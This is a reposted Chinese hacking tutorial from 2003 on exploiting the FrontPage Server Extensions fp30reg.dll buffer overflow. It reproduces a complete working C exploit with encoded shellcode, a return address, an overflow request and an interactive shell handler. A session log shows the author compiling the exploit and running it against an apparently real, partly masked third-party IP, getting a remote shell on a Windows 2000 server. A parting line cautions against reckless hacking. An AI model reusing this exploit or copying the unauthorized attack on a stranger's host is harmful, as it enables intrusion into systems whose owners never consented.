Front page server溢出攻击实例 《转》
来源:岁月联盟
时间:2003-07-11
下 载:http://www.nsfocus.com/proof/fpse2000ex.c
哈哈~大家好!!~(一上来就骂人??!)危卵~真实越来越"厉害"了,全一段时间的.printer硝烟未尽,现在又出来一个frontpage server fp30reg.dll溢出漏洞~不过便宜新手们了……(嘿嘿~!)关于该漏洞的资料看本站上面的公告!(Bytes~!废话好多!)
言归正传..今天我给大家讲讲怎么利用..
先找一个,小羊羔~~(啊~小鬼子又进村了!!~?)嗯~~~谁呢??就你吧---61.153.xxx.xxx(国内的~别抓我啊~!!我不想坐牢!!).ping一下先,别timed out!就GOD!!!了~哈哈!:
Pinging 61.153.xxx.xxxwith 32 bytes of data:
Reply from 61.153.xxx.xx: bytes=32 time=36ms TTL=124
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124
………………(啊哈~!速度不错~不拿你开刀我都找不到理由~!~哈哈~!我邪恶吗??)
Let me start...
telnet 211.100.xxx.xxx(My fat hen,haha)
Red Hat Linux release 7.0.1J (Guinness)(羡慕吧??~~哈哈)
Kernel 2.2.16-22 on an i686
login: bytes
passwd:xxxxxxx(当然不告诉你la)
[root@glb-linux-1 bytes]#id
uid=0 (root) gid=2513(other)(嘿嘿~@!)
[root@glb-linux-1 bytes]# vi kill.c (copy来原码,顺便说一句,这段程序很漂亮~!!)
/*
* fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team
* http://www.nsfocus.com
*/
/* # 前面这里是版权信息,以及程序说明*/
#include
#include
#include
#include
#include
#include
#include
#include
/* fat shellcode */
/* # shellcode比较多 */
char shellcode[] =
"/xeb/x1a/x5f/x56/x56/x57/x5e/x33/xc9/xac/x3a/xc1/x74/x13/x3c/x30/x74/x5/x34"
"/xaa/xaa/xeb/xf2/xac/x2c/x40/xeb/xf6/xe8/xe1/xff/xff/xff/xff/x21/x46/x2b/x46"
"/xb6/xa3/xaa/xaa/xf9/xfc/xfd/x27/x17/x4e/x5c/x55/x55/x13/xed/xa8/xaa/xaa/x12"
"/x66/x66/x66/x66/x59/x1/x6d/x2f/x66/x5d/x55/x55/xaa/xaa/xaa/xaa/x21/xef/xa2"
"/x21/x22/x2e/xaa/xaa/xaa/x23/x27/x62/x5d/x55/x55/x21/xff/xa2/x21/x28/x22/xaa"
"/xaa/xaa/x23/x2f/x6e/x5d/x55/x55/x21/xe7/xa2/x21/xfb/xa2/x23/x3f/x6a/x5d/x55"
"/x55/x43/x61/xaf/xaa/xaa/x25/x2f/x16/x5d/x55/x55/x27/x17/x5a/x5d/x55/x55/xce"
"/xb/xaa/xaa/xaa/xaa/x23/xed/xa2/xce/x23/x97/xaa/xaa/xaa/xaa/x6d/x2f/x5a/x5d"
"/x55/x55/x55/x55/x55/x55/x21/x2f/x16/x5d/x55/x55/x29/x42/xad/x23/x2f/x5e/x5d"
"/x55/x55/x6d/x2f/x12/x5d/x55/x55/xaa/xaa/x4a/xdd/x42/xcd/xaf/xaa/xaa/x29/x17"
"/x66/x5d/x55/x55/xaa/xa5/x2f/x77/xab/xaa/xaa/x21/x27/x12/x5d/x55/x55/x2b/x6b"
"/xaa/xaa/xab/xaa/x23/x27/x12/x5d/x55/x55/x2b/x17/x12/x5d/x55/x55/xaa/xaa/xaa"
"/xd2/xdf/xa0/x6d/x2f/x12/x5d/x55/x55/xaa/xaa/x5a/x15/x21/x3f/x12/x5d/x55/x55"
"/x99/x6a/xcc/x21/xa8/x97/xe7/xf0/xaa/xaa/xa5/x2f/x30/x70/xab/xaa/xaa/x21/x27"
"/x12/x5d/x55/x55/x21/xfb/x96/x21/x2f/x12/x5d/x55/x55/x99/x63/xcc/x21/xa6/xba"
"/x2b/x53/xfa/xef/xaa/xaa/xa5/x2f/xd3/xab/xaa/xaa/x21/x3f/x12/x5d/x55/x55/x21"
"/xe8/x96/x21/x27/x12/x5d/x55/x55/x21/xfe/xab/xd2/xa9/x3f/x12/x5d/x55/x55/x23"
"/x3f/x1e/x5d/x55/x55/x21/x2f/x1e/x5d/x55/x55/x21/xe2/xa6/xa9/x27/x12/x5d/x55"
"/x55/x23/x27/x6/x5d/x55/x55/x21/x3f/x6/x5d/x55/x55/x2b/x90/xe1/xef/xf8/xe4/xa5"
"/x2f/x99/xab/xaa/xaa/x21/x2f/x6/x5d/x55/x55/x2b/xd2/xae/xef/xe6/x99/x98/xa5"
"/x2f/x8a/xab/xaa/xaa/x21/x27/x12/x5d/x55/x55/x23/x27/xe/x5d/x55/x55/x21/x3f"
"/x1e/x5d/x55/x55/x21/x2f/x12/x5d/x55/x55/xa9/xe8/x8a/x23/x2f/x6/x5d/x55/x55"
"/x6d/x2f/x2/x5d/x55/x55/xaa/xaa/xaa/xaa/x41/xb4/x21/x27/x2/x5d/x55/x55/x29/x6b"
"/xab/x23/x27/x2/x5d/x55/x55/x21/x3f/x6/x5d/x55/x55/x29/x68/xae/x23/x3f/x6/x5d"
"/x55/x55/x21/x2f/x1e/x5d/x55/x55/x21/x27/x2/x5d/x55/x55/x91/xe2/xb2/xa5/x27"
"/x6a/xaa/xaa/xaa/x21/x3f/x6/x5d/x55/x55/x21/xa8/x21/x27/x12/x5d/x55/x55/x2b"
"/x96/xab/xed/xcf/xde/xfa/xa5/x2f/xa/xaa/xaa/xaa/x21/x3f/x6/x5d/x55/x55/x21/xa8"
"/x21/x27/x12/x5d/x55/x55/x2b/xd6/xab/xae/xd8/xc5/xc9/xeb/xa5/x2f/x2e/xaa/xaa"
"/xaa/x21/x3f/x2/x5d/x55/x55/xa9/x3f/x2/x5d/x55/x55/xa9/x3f/x12/x5d/x55/x55"
"/x21/x2f/x1e/x5d/x55/x55/x21/xe2/x8e/x99/x6a/xcc/x21/xae/xa0/x23/x2f/x6/x5d"
"/x55/x55/x21/x27/x1e/x5d/x55/x55/x21/xfb/xba/x21/x2f/x6/x5d/x55/x55/x27/xe6"
"/xba/x55/x23/x27/x6/x5d/x55/x55/x21/x3f/x6/x5d/x55/x55/xa9/x3f/x6/x5d/x55/x55"
"/xa9/x3f/x6/x5d/x55/x55/xa9/x3f/x6/x5d/x55/x55/xa9/x3f/x12/x5d/x55/x55/x21/x2f"
"/x1e/x5d/x55/x55/x21/xe2/xb6/x21/xbe/xa0/x23/x3f/x6/x5d/x55/x55/x21/x2f/x6/x5d"
"/x55/x55/xa9/x2f/x12/x5d/x55/x55/x23/x2f/x66/x5d/x55/x55/x41/xaf/x43/xa7/x55"
"/x55/x55/x43/xbc/x54/x55/x55/x27/x17/x5a/x5d/x55/x55/x21/xed/xa2/xce/x9/xaa"
"/xaa/xaa/xaa/x29/x17/x66/x5d/x55/x55/xaa/xdf/xaf/x43/xf4/xa9/xaa/xaa/x6d/x2f"
"/x6/x5d/x55/x55/xab/xaa/xaa/xaa/x41/xa5/x21/x27/x6/x5d/x55/x55/x29/x6b/xab/x23"
"/x27/x6/x5d/x55/x55/x29/x17/x6/x5d/x55/x55/xa2/xd7/xc4/x21/x5e/x21/x3f/x16"
"/x5d/x55/x55/xf8/x21/x2f/xe/x5d/x55/x55/xfa/x55/x3f/x66/x5d/x55/x55/x91/x5e"
"/x3a/xe9/xe1/xe9/xe1/x21/x27/x6/x5d/x55/x55/x23/x2e/x27/x7a/x5d/x55/x55/x41"
"/xa5/x21/x3f/x16/x5d/x55/x55/x29/x68/xab/x23/x3f/x16/x5d/x55/x55/x21/x2f/x16"
"/x5d/x55/x55/xa5/x14/xa2/x2f/x63/xdf/xba/x21/x3f/x16/x5d/x55/x55/xa5/x14/xe8"
"/xab/x2f/x6a/xde/xa8/x41/xa8/x41/x78/x21/x27/x16/x5d/x55/x55/x29/x6b/xab/x23"
"/x27/x16/x5d/x55/x55/x43/xd0/x55/x55/x55/x6d/x2f/x8e/x5d/x55/x55/xa6/xaa/xaa"
"/xaa/x6d/x2f/x82/x5d/x55/x55/xaa/xaa/xaa/xaa/x6d/x2f/x86/x5d/x55/x55/xab/xaa"
"/xaa/xaa/x21/x5e/xc0/xaa/x27/x3f/x8e/x5d/x55/x55/xf8/x27/x2f/xe2/x5d/x55/x55"
"/xfa/x27/x27/xe6/x5d/x55/x55/xfb/x55/x3f/x7e/x5d/x55/x55/x91/x5e/x3a/xe9/xe1"
"/xe9/xe1/x21/x5e/xc0/xaa/x27/x3f/x8e/x5d/x55/x55/xf8/x27/x2f/xea/x5d/x55/x55"
"/xfa/x27/x27/xee/x5d/x55/x55/xfb/x55/x3f/x7e/x5d/x55/x55/x91/x5e/x3a/xe9/xe1"
"/xe9/xe1/x27/x17/xca/x5d/x55/x55/x99/x6a/x13/xbb/xaa/xaa/xaa/x58/x1/x6d/x2f"
"/x26/x5d/x55/x55/xab/xab/xaa/xaa/xcc/x6d/x2f/x3a/x5d/x55/x55/xaa/xaa/x21/x3f"
"/xee/x5d/x55/x55/x23/x3f/x32/x5d/x55/x55/x21/x2f/xe2/x5d/x55/x55/x23/x2f/x36"
"/x5d/x55/x55/x21/x27/xe2/x5d/x55/x55/x23/x27/xa/x5d/x55/x55/x6d/x2f/x6/x5d/x55"
"/x55/xaa/xaa/xaa/xaa/x21/x5e/x27/x3f/xfa/x5d/x55/x55/xf8/x27/x2f/xca/x5d/x55"
"/x55/xfa/xc0/xaa/xc0/xaa/xc0/xaa/xc0/xab/xc0/xaa/xc0/xaa/x21/x27/x16/x5d/x55"
"/x55/xfb/xc0/xaa/x55/x3f/x72/x5d/x55/x55/x91/x5e/x3a/xe9/xe1/xe9/xe1/x23/x2f"
"/x6/x5d/x55/x55/x21/x3f/x16/x5d/x55/x55/x29/x68/xa2/x23/x3f/x16/x5d/x55/x55"
"/x21/x5e/xc0/xaa/xc0/xaa/x27/x2f/x96/x5d/x55/x55/xfa/xc2/xaa/xa2/xaa/xaa/x27"
"/x27/x56/x5d/x55/x55/xfb/x21/x3f/xe6/x5d/x55/x55/xf8/x55/x3f/x4a/x5d/x55/x55"
"/x91/x5e/x3a/xe9/xe1/xe9/xe1/x6d/x2f/x6/x5d/x55/x55/xa2/xaa/xaa/xaa/x21/x5e"
"/xc0/xaa/x27/x2f/x6/x5d/x55/x55/xfa/x21/x27/x16/x5d/x55/x55/x29/x6b/xa3/xfb"
"/x21/x3f/x6a/x5d/x55/x55/xf8/x55/x3f/x62/x5d/x55/x55/x91/x5e/x3a/xe9/xe1/xe9"
"/xe1/x12/xab/xaa/xaa/xaa/x2f/x6a/xa5/x2e/xf4/xab/xaa/xaa/x21/x5e/xc0/xaa/xc0"
"/xaa/x27/x27/x96/x5d/x55/x55/xfb/xc2/xaa/xa2/xaa/xaa/x27/x3f/x56/x5d/x55/x55"
"/xf8/x21/x2f/xe6/x5d/x55/x55/xfa/x55/x3f/x4a/x5d/x55/x55/x91/x5e/x3a/xe9/xe1"
"/xe9/xe1/x29/x17/x96/x5d/x55/x55/xaa/xd4/xcb/x21/x5e/xc0/xaa/x27/x27/x96/x5d"
"/x55/x55/xfb/x21/x3f/x96/x5d/x55/x55/xf8/x27/x2f/x56/x5d/x55/x55/xfa/x21/x27"
"/xe6/x5d/x55/x55/xfb/x55/x3f/x4e/x5d/x55/x55/x91/x5e/x3a/xe9/xe1/xe9/xe1/x29"
"/x17/x96/x5d/x55/x55/xaa/xd4/x8c/x21/x5e/xc0/xaa/x27/x3f/x96/x5d/x55/x55/xf8"
"/x27/x2f/x56/x5d/x55/x55/xfa/x21/x27/x6a/x5d/x55/x55/xfb/x55/x3f/x62/x5d/x55"
"/x55/x91/x5e/x3a/xe9/xe1/xe9/xe1/x43/x68/xaa/xaa/xaa/x6d/x2f/x96/x5d/x55/x55"
"/xaa/xa2/xaa/xaa/x21/x5e/x27/x3f/x96/x5d/x55/x55/xf8/x27/x2f/x56/x5d/x55/x55"
"/xfa/x21/x27/x6a/x5d/x55/x55/xfb/x55/x3f/x6e/x5d/x55/x55/x91/x5e/x3a/xe9/xe1"
"/xe9/xe1/x23/x2f/x6/x5d/x55/x55/x29/x17/x6/x5d/x55/x55/xab/xde/xf2/x6d/x2f/x6"
"/x5d/x55/x55/xa2/xaa/xaa/xaa/x21/x5e/xc0/xaa/x27/x3f/x6/x5d/x55/x55/xf8/x21"
"/x2f/x6/x5d/x55/x55/xfa/x21/x27/x16/x5d/x55/x55/xfb/x21/x3f/xea/x5d/x55/x55"
"/xf8/x55/x3f/x42/x5d/x55/x55/x91/x5e/x3a/xe9/xe1/xe9/xe1/x12/xab/xaa/xaa/xaa"
"/x2f/x6a/xde/xbc/x21/x5e/xc2/x55/x55/x55/xd5/x55/x3f/x46/x5d/x55/x55/x91/x5e"
"/x3a/xe9/xe1/xe9/xe1/x41/x4b/x41/x87/x21/x5e/xc0/xaa/x27/x27/x96/x5d/x55/x55"
"/xfb/x21/x3f/x96/x5d/x55/x55/xf8/x27/x2f/x56/x5d/x55/x55/xfa/x21/x27/xea/x5d"
"/x55/x55/xfb/x55/x3f/x42/x5d/x55/x55/x91/x5e/x3a/xe9/xe1/xe9/xe1/x43/x3f/x54"
"/x55/x55/x41/x54/xf2/xfa/x21/x17/x16/x5d/x55/x55/x23/xed/x58/x69/x21/xee/x8e"
"/xa6/xaf/x12/xaa/xaa/xaa/x6d/xaa/xee/x99/x88/xbb/x99/x6a/x69/x41/x46/x42/x9a"
"/x50/x55/x55/xe9/xd8/xcf/xcb/xde/xcf/xfa/xc3/xda/xcf/xaa/xe9/xd8/xcf/xcb/xde"
"/xcf/xfa/xd8/xc5/xc9/xcf/xd9/xd9/xeb/xaa/xe9/xc6/xc5/xd9/xcf/xe2/xcb/xc4/xce"
"/xc6/xcf/xaa/xfa/xcf/xcf/xc1/xe4/xcb/xc7/xcf/xce/xfa/xc3/xda/xcf/xaa/xf8/xcf"
"/xcb/xce/xec/xc3/xc6/xcf/xaa/xfd/xd8/xc3/xde/xcf/xec/xc3/xc6/xcf/xaa/xf9/xc6"
"/xcf/xcf/xda/xaa/xaa/xc9/xc7/xce/x84/xcf/xd2/xcf/xaa/xa7/xa0/xcf/xd2/xc3/xde"
"/xa7/xa0/xaa/xf2/xe5/xf8/xee/xeb/xfe/xeb/xaa";
/* # 没下趴下吧?*/
int
resolv (char *host, long *ip)
{
struct hostent *hp;
if ((*ip = inet_addr (host))<0)
{
if ((hp = gethostbyname (host)) == NULL)
{
fprintf (stderr, "%s: unknown host/n", host);
exit (-1);
}
*ip = *(unsigned long *) hp->h_addr;
}
return 0;
}
int
connect_to (char *hostname, short port)
{
struct sockaddr_in sa;
int s;
s = socket (AF_INET, SOCK_STREAM, 0);
resolv (hostname, (long *) &sa.sin_addr.s_addr);
sa.sin_family = AF_INET;
sa.sin_port = htons (port);
if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1)
{
perror("connect");
exit(-1);
}
return s;
}
void
runshell (int sockd)
{
char buff[1024];
int ret;
fd_set fds;
printf("/nPress CTRL_C to exit the shell!/n");
for (;
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (sockd, &fds);
if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0)
{
exit (-1);
}
if (FD_ISSET (sockd, &fds))
{
bzero (buff, sizeof buff);
if ((ret=read(sockd,buff,sizeof(buff)))<1)
{
fprintf (stderr, "Connection closed/n");
exit (-1);
}
write(1,buff,ret);
}
if (FD_ISSET (0, &fds))
{
bzero (buff, sizeof buff);
ret=read(0,buff,sizeof(buff));
write(sockd,buff,ret);
}
}
}
main (int argc, char **argv)
{
char overbuff[400];
char buff[4096];
/* If system has the unicode bug, it is possible to attack fp4areg.dll */
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */
char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll";
char server[] = "www.blahblah.com";
char retaddress[] = "/x62/x18/xd5/x67";
char jmpshell[] = "/xff/x66/x78";
int i, sockfd;
int port = 80;
if (argc < 2)
{
printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team/n/n");
printf ("Usage: %s victim [port]/n", argv[0]);
exit (-1);
}
if (argc > 2) port = atoi (argv[2]);
sockfd = connect_to (argv[1], port);
bzero (overbuff, sizeof (overbuff));
bzero (buff, sizeof (buff));
memset (overbuff, 'a', 258);
memcpy (overbuff, jmpshell, strlen (jmpshell));
strcpy (overbuff + 258, "%c");
for (i = 0; i < 0x50; i += 4)
strncat (overbuff, retaddress, 4);
strcat (overbuff, "aaa");
sprintf (buff,
"GET %s?%s HTTP/1.1 /nHOST:%s/r/nContent-Type: /
text/html/nContent-Length:%d/r/nProxy_Connection: Keep-Alive/r/n/r/n%s",
fppath, overbuff, server, strlen (shellcode), shellcode);
printf ("buff len = %d/n", strlen (buff));
write (sockfd, buff, strlen (buff));
printf ("payload sent!/n");
if(read (sockfd, buff, strlen(buff))<0)
{
printf("EOF/n");
exit(-1);
}
else
{
if(memcmp(buff,"XORDATA",8)==0)
{
printf("exploit succeed/n");
/* Press Enter key to get the command prompt */
runshell (sockfd);
}
else
{
printf("exploit failed/n");
close(sockfd);
exit(-1);
}
}
}
:w
:q(保存并退出)
[root@glb-linux-1 bytes]# gcc -o kill kill.c(编译成功)
[root@glb-linux-1 bytes]# ./kill(看一下说明先)
Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team
Usage: ./iis victim [port]
[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80
buff len = 2201
payload sent!
exploit failed (我bytes每次都没~死狗狗的狗运!!!哈哈)
[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80(再来~!)
buff len = 2201
payload sent!
exploit succeed
Press CTRL_C to exit the shell!(宝贝宝贝宝贝~~~出来了哦~一个shell哈哈~!)
dir c:/
Microsoft Windows 2000 [Version 5.00.2195](呀~win2k?!应该是iis5.0的,呜~我只有machinename权限~~~~5555555)
(C) 版权所有 1985-2000 Microsoft Corp.
C:/WINNT/system32>cd c:/
c:/dir
……
接下来的作我向大家都会了,我也该下了~哈哈~不过我忠告各位一句,**破坏永远比建设容易**,所以~千万不要乱黑一气!!!
bye!!!
ZZZZZZZZZZzzzzzzzzzzzzzz……
Bytes
文章出处:第八军团
文章作者:Bytes
下一篇:加固NT和IIS的安全 《转》
